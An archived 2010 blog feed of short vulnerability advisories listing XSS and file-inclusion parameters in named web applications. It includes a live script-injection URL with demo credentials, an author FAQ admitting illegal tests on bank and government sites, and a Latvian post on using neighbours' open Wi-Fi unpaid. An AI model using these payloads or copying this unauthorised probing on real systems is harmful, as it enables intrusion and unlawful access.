<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-1009764183767741775</id><updated>2012-01-23T02:37:57.675-08:00</updated><category term='WIFI'/><category term='Hackers'/><category term='BACKTRACK'/><category term='RTFM'/><category term='E-books'/><title type='text'>-UNSECURED SYSTEMS-</title><subtitle type='html'>vol.2</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>69</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-7836597449147100820</id><published>2010-09-15T00:53:00.000-07:00</published><updated>2010-09-15T00:54:30.750-07:00</updated><title type='text'>XSE shopping cart  XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 15 September 2010&lt;br /&gt;vendor:http://www.ecommercesoft.net/&lt;br /&gt;affected versions:ver.: 1.5.3.0 / 1.5.2.1&lt;br /&gt;and other prior&lt;br /&gt;versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;XSE shopping cart contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "id" parameter in "default.aspx" and "type" parameter in "SearchResults.aspx" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;##############################################&lt;br /&gt;&lt;br /&gt;Solution:&lt;br /&gt;Filter malicious characters and character sequences in a web proxy.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-7836597449147100820?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/7836597449147100820/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=7836597449147100820' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7836597449147100820'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7836597449147100820'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2010/09/xse-shopping-cart-xss-vuln.html' title='XSE shopping cart  XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-7936008583476431832</id><published>2010-09-12T04:34:00.000-07:00</published><updated>2010-09-12T04:35:40.913-07:00</updated><title type='text'>Open Classifieds version 1.7.0.2 XSS Vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 12 September 2010&lt;br /&gt;vendor:http://open-classifieds.com/&lt;br /&gt;affected versions:Open Classifieds version 1.7.0.2&lt;br /&gt;                  Open Classifieds version 1.7.0&lt;br /&gt;and other prior&lt;br /&gt;versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Open Classifieds contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "desc","price","title","place" parameter in "index.php"  and "subject" parameter in "contact.htm" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;##############################################&lt;br /&gt;&lt;br /&gt;Solution:&lt;br /&gt;Filter malicious characters and character sequences in a web proxy.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-7936008583476431832?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/7936008583476431832/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=7936008583476431832' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7936008583476431832'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7936008583476431832'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2010/09/open-classifieds-version-1702-xss-vuln.html' title='Open Classifieds version 1.7.0.2 XSS Vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-3560583151088693740</id><published>2010-09-11T16:29:00.000-07:00</published><updated>2010-09-11T16:34:41.574-07:00</updated><title type='text'>new r0t FAQ edition 0.91 alfa</title><content type='html'>r0t FAQ edition 0.91 alfa&lt;br /&gt;&lt;br /&gt;Hi again,&lt;br /&gt;Im r0t who reports mostly about new SQL/XSS attack vulnerabilities on net.&lt;br /&gt;So there is some things that i want to do clear:&lt;br /&gt;&lt;br /&gt;1)You arent correct with you report.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1.Every from my vulnerability report is autmaticaly reported to biggest vuln. research&lt;br /&gt;teams/bugtraq sites (secunia,osvdb,frsirt,security.nnov.ru)So, thats mean or you are more skilled that we all together or you mis.. some stuff. 99% of all my reports are later verified by biggest and best vulnerability researchers on the world.&lt;br /&gt;So i have mistakes also with my reports , cauz sometimes i report vuln. for software which dont have any public demos or trial versions and my test are only tested on "case study" or clients who use that software.&lt;br /&gt;In that way sometimes vuln researchers after me to verify my report have big problems with that, cauz who wanna test in real examples and of course its illegal, so you can only imagine how is to prove something doing test on bank sites and .gov sites.&lt;br /&gt;about that of course i have problems with governments,police and other structures who fight vS "hackers" at all , but its my problem ,not yours.&lt;br /&gt;Do it mean that i had broken laws with my tests and reports?&lt;br /&gt;Yes of course, but as i used only for testing and reporting, i can answer in any justice for that, for my tests and reports.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2)Next time report to vendor!&lt;br /&gt;&lt;br /&gt;2.Why i dont report to vendors about vulnerabilities?There was few times when i did report and one of them was Vbulletin my favorite forum developers, when from few reports i didnt get answers in some weeks i automatically forgot about reporting to vendors. Of course not all vendors is like one vendor and one vendor isnt like others.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3) Its isnt professional when you dont report to vendors.&lt;br /&gt;&lt;br /&gt;3.Look if you are one of those vendors who are listed on my blog, so thats shows that you had mistake in your work and your product was unsecured and thats means that you arent professional, im not a developer im only pentester.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4)Give me live example.&lt;br /&gt;&lt;br /&gt;4. If you arent from Secunia,frsirt,osvdb or vendor i will not provide you with any live examples or HowTo´s.So anyway forget about that and RFM!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5)We had fixed that in new release,delete your report.&lt;br /&gt;&lt;br /&gt;5.Look Im very glad that you had fixed that vuln., but your vuln. version of your developed software is already in use and many people will use it for while.&lt;br /&gt;Its my reports and nothing will be deleted only if i will recognize that it was my mistake.&lt;br /&gt;&lt;br /&gt;6) You are hacker.&lt;br /&gt;&lt;br /&gt;6. I never had that idea that im hacker , hacker for me i guru in that skills and knowledge that i dont have. I do only my "job" i report about unsecure systems, with wish that not a vendor ,but software potentional user will now about unsecured systems and he will get more easy to chose witch one software he will use in his project.&lt;br /&gt;Yes of course i admit and moderate some hacker and security boards now , but there i am with another "ID", cauz sometimes to be a r0t, can very dangerous.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PS.&lt;br /&gt;I hope this FAQ will give answers to most of your questions, if you have any another questions about me or my reports you can mail me: krustevs[at] gmail.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-3560583151088693740?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/3560583151088693740/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=3560583151088693740' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/3560583151088693740'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/3560583151088693740'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2010/09/new-r0t-faq-edition-091-alfa.html' title='new r0t FAQ edition 0.91 alfa'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-2504351040702441596</id><published>2010-09-09T16:04:00.000-07:00</published><updated>2010-09-09T16:25:12.859-07:00</updated><title type='text'>NetArtMEDIA Real Estate Portal v2.0 XSS vuln. + NetArtMEDIA lfi.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 09 September 2010&lt;br /&gt;vendor:http://www.netartmedia.net/realestate/&lt;br /&gt;affected versions:NetArtMEDIA Real Estate Portal v2.0 and other&lt;br /&gt;versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;NetArtMEDIA Real Estate Portal v2.0  contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "id" parameter in "AGENTS/index.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;for successful exploitation you must be logged in.&lt;br /&gt;##############################################&lt;br /&gt;&lt;br /&gt;Solution:&lt;br /&gt;Filter malicious characters and character sequences in a web proxy.&lt;br /&gt;############################################### &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;+ bonus LOCAL FILE INCLUDE VULN. IN NetArtMEDIA products.&lt;br /&gt;&lt;br /&gt;Almost all NetArtMEDIA products have local file inclusion vuln.&lt;br /&gt;in exmaple in Real Estate Portal v2.0 -"folder" and "action" parameter in "AGENTS/index.php"&lt;br /&gt;by other products try also "action" parameter for local file include.&lt;br /&gt;Vendor website is running on product "WebSiteAdmin v2.1"(http://www.websiteadmin.biz/),  for local file include use input in "lng" parameter in "ADMIN/login.php"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;=====================================================================================&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-2504351040702441596?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/2504351040702441596/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=2504351040702441596' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/2504351040702441596'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/2504351040702441596'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2010/09/netartmedia-real-estate-portal-v20-xss.html' title='NetArtMEDIA Real Estate Portal v2.0 XSS vuln. + NetArtMEDIA lfi.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-7234584004579482923</id><published>2010-09-09T15:56:00.000-07:00</published><updated>2010-09-09T15:59:06.214-07:00</updated><title type='text'>iBoutique.MALL 1.2 XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 09 September 2010&lt;br /&gt;vendor:http://www.netartmedia.net/mall/&lt;br /&gt;affected versions:iBoutique.MALL 1.2and other&lt;br /&gt;versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;iBoutique.MALL 1.2 contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "tmpl" parameter in "index.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;##############################################&lt;br /&gt;&lt;br /&gt;Solution:&lt;br /&gt;Filter malicious characters and character sequences in a web proxy.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-7234584004579482923?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/7234584004579482923/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=7234584004579482923' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7234584004579482923'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7234584004579482923'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2010/09/iboutiquemall-12-xss-vuln.html' title='iBoutique.MALL 1.2 XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-2825660106187284143</id><published>2010-09-09T14:05:00.000-07:00</published><updated>2010-09-09T15:45:54.667-07:00</updated><title type='text'>PowerStore™ 3 XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 09 September 2010&lt;br /&gt;vendor:http://www.webassist.com/php-scripts-and-solutions/powerstore/&lt;br /&gt;affected versions:PowerStore™ 3 and other&lt;br /&gt;versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;PowerStore™ 3 contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "totalRows_WADAProducts" parameter in "Products_Results.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;##############################################&lt;br /&gt;&lt;br /&gt;Solution:&lt;br /&gt;Filter malicious characters and character sequences in a web proxy.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-2825660106187284143?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/2825660106187284143/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=2825660106187284143' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/2825660106187284143'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/2825660106187284143'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2010/09/powerstore-3-xss-vuln.html' title='PowerStore™ 3 XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-3851007247887374953</id><published>2010-09-09T13:48:00.001-07:00</published><updated>2010-09-09T13:51:49.694-07:00</updated><title type='text'>NetArtMEDIA Car Portal v2.0 XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 09 September 2010&lt;br /&gt;vendor:http://www.netartmedia.net/carsportal/&lt;br /&gt;affected versions:v2.0 and other&lt;br /&gt;versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;NetArtMEDIA Car Portal contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "car_id" parameter in "index.php" and input passed to the "y" parameter in "include/images.php' isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;##############################################&lt;br /&gt;&lt;br /&gt;Solution:&lt;br /&gt;Filter malicious characters and character sequences in a web proxy.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-3851007247887374953?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/3851007247887374953/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=3851007247887374953' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/3851007247887374953'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/3851007247887374953'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2010/09/netartmedia-car-portal-v20-xss-vuln.html' title='NetArtMEDIA Car Portal v2.0 XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-1216390136608409203</id><published>2010-09-09T03:42:00.000-07:00</published><updated>2010-09-09T03:44:27.448-07:00</updated><title type='text'>Fendereejam balticom Trafiku.</title><content type='html'>Tiem kas izmanto na savu netu un patik lietot programas ka Utorrent.&lt;br /&gt;Kaut kad nesen pamaniju vienu fishku ar balticom klientiem, kuri var netu lietot tikai ar ierobezhotu pc skatu,toest ja gribi otro kompi pielsegt maksa papildus.&lt;br /&gt;Kadu vakaru nebiju ipasi apmierinats ar mana kaimina Vasjas sniegto atrumu velkot filmas, pameiginaju apskatities kas notiek apkart.&lt;br /&gt;Piesledzoties pie vairakiem bezparoles labdariem, meiginot ieiet mani redirekteja uz uz balticom klientu majas lapu pazinojot par to ka mana mac adrese nav registreta tikla un man nav iedalita IP, vai kaut kas tamlidzigs.&lt;br /&gt;Protams ar talruni lai es varetu pieslegt savu pc ,jeb ka vini saka registret to par papildus maksu.&lt;br /&gt;Nets ir tatad izmantosim to kaut vai filmam neveicot nekadas ipasi sarezhgitas darbibas.&lt;br /&gt;Musu uTorrentam jabut procesa , isak sakot failu velkam pa musu vajo kanalu un vienkarsi nenamam un parsledzamies uz balticom un skatamies - vuallaa!&lt;br /&gt;Terejam ne savu trafiku un iegustam iespejams velamo failu.&lt;br /&gt;Ja metode neiet Jums ar pirmo reizi cauri meiginiet vel.&lt;br /&gt;Ceru ka neaizravos ar nepareizu sarunvalodu un izskaidroju pavisam neachgaarni.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-1216390136608409203?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/1216390136608409203/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=1216390136608409203' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/1216390136608409203'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/1216390136608409203'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2010/09/fendereejam-balticom-trafiku.html' title='Fendereejam balticom Trafiku.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-917546818082489608</id><published>2010-09-09T00:23:00.000-07:00</published><updated>2010-09-09T00:28:48.189-07:00</updated><title type='text'>Member Management System v 4.0 XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 09 September 2010&lt;br /&gt;vendor:http://www.expinion.net/Applications/MMS_overview.asp&lt;br /&gt;affected versions:v 4.0 and other&lt;br /&gt;versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Member Management System contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "REF_URL" parameter in "admin/index.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;##############################################&lt;br /&gt;&lt;br /&gt;Solution:&lt;br /&gt;Filter malicious characters and character sequences in a web proxy.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-917546818082489608?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/917546818082489608/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=917546818082489608' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/917546818082489608'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/917546818082489608'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2010/09/member-management-system-v-40-xss-vuln.html' title='Member Management System v 4.0 XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-5223432639275257518</id><published>2010-08-10T18:18:00.000-07:00</published><updated>2010-08-10T18:41:17.609-07:00</updated><title type='text'>Google Store vuln.</title><content type='html'>4 years ago i had posted about XSS vuln. in GoogleStore:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://pridels0.blogspot.com/2006/04/googlestore-xss-vuln.html"&gt;GoogleStore XSS@2006 year&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Today i had checked again , but others parameters.&lt;br /&gt;And look what i found- an attacker can easy change file(image,etc) location to his malicius file.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_XwbWaSodqYA/TGH90QotNII/AAAAAAAAAAk/lbdY2t7P2fI/s1600/r0t2.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 200px;" src="http://2.bp.blogspot.com/_XwbWaSodqYA/TGH90QotNII/AAAAAAAAAAk/lbdY2t7P2fI/s320/r0t2.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5503959293884183682" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Live P0c:&lt;br /&gt;http://www.googlestore.com/view_large.aspx?img=http://img834.imageshack.us/img834/3778/r0t.png&amp;edp_no=16918&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PS. probaly nothing special* as a vuln.,but its interesting why coders/developers of GoogleStore do so simple mistakes.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-5223432639275257518?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/5223432639275257518/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=5223432639275257518' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/5223432639275257518'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/5223432639275257518'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2010/08/google-store-vuln.html' title='Google Store vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_XwbWaSodqYA/TGH90QotNII/AAAAAAAAAAk/lbdY2t7P2fI/s72-c/r0t2.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-8927899676000842736</id><published>2010-03-14T20:30:00.001-07:00</published><updated>2010-03-14T20:30:25.991-07:00</updated><title type='text'>DirectAdmin &lt;= v1.35.1 XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 15 March 2010&lt;br /&gt;vendor:http://www.directadmin.com/&lt;br /&gt;affected versions:v1.35.1 and other&lt;br /&gt;versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;DirectAdmin contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "name" parameter in "CMD_DB_VIEW" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;##############################################&lt;br /&gt;live PoC:&lt;br /&gt;http://www.directadmin.com:2222/CMD_DB_VIEW?DOMAIN=demo.com&amp;name=%22%3E%3Cscript%3Ealert%28111%29;%3C/script%3E&lt;br /&gt;PS.&lt;br /&gt;need to login:&lt;br /&gt;demo_user:demo&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Filter malicious characters and character sequences in a web proxy.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-8927899676000842736?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/8927899676000842736/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=8927899676000842736' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/8927899676000842736'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/8927899676000842736'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2010/03/directadmin-v1351-xss-vuln.html' title='DirectAdmin &lt;= v1.35.1 XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-670673772195673007</id><published>2010-03-14T19:10:00.000-07:00</published><updated>2010-03-14T19:32:02.227-07:00</updated><title type='text'>Garam ejot, jeb back...</title><content type='html'>Sen nebiju bijis , bet shobrid atradu mazu mirkli , lai uzrakstitu kadu domu un droshi vien ka iet.&lt;br /&gt;&lt;br /&gt;Pedeja laika skatos, ka vards Neo ir kluvis loti populars LV prese.&lt;br /&gt;Ko tur 